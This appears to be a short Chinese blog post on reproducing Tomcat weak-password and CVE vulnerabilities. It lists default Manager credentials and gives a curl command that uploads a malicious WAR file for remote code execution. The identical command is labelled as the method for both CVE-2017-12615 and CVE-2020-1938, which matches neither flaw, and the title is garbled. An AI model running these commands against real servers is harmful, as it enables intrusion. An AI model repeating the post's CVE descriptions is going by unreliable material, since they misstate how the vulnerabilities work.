漏洞复现Tomcat系列弱口令、CVE-2017-CVE-2020-1938
要复现Tomcat系列的弱口令漏洞,你需要具备以下条件:
- 对应的Tomcat版本(例如Tomcat 6, 7, 8, 9)
- 已知的弱口令(通常是
admin
/admin
或tomcat
/s3cret
等) - 网络访问权限
对于CVE-2017-12615:
curl -u 'tomcat:tomcat' -T /path/to/your/exploit.war 'http://target:8080/manager/text/deploy?path=/exploit&update=true'
对于CVE-2020-1938:
curl -u 'tomcat:tomcat' -T /path/to/your/exploit.war 'http://target:8080/manager/text/deploy?path=/exploit&update=true'
请注意,这些命令假设目标Tomcat服务器使用了默认的用户名和密码,并且Manager应用程序没有更改路径。如果情况不同,你需要相应地修改URL和认证信息。
这些命令会尝试上传一个恶意的WAR文件到Tomcat服务器,如果成功,可能会导致远程代码执行漏洞。在实际环境中,这些操作可能会违反计算机安全法规,因此请确保你已经得到了目标系统的合法授权,并且你的行为不会违反任何法律法规。
评论已关闭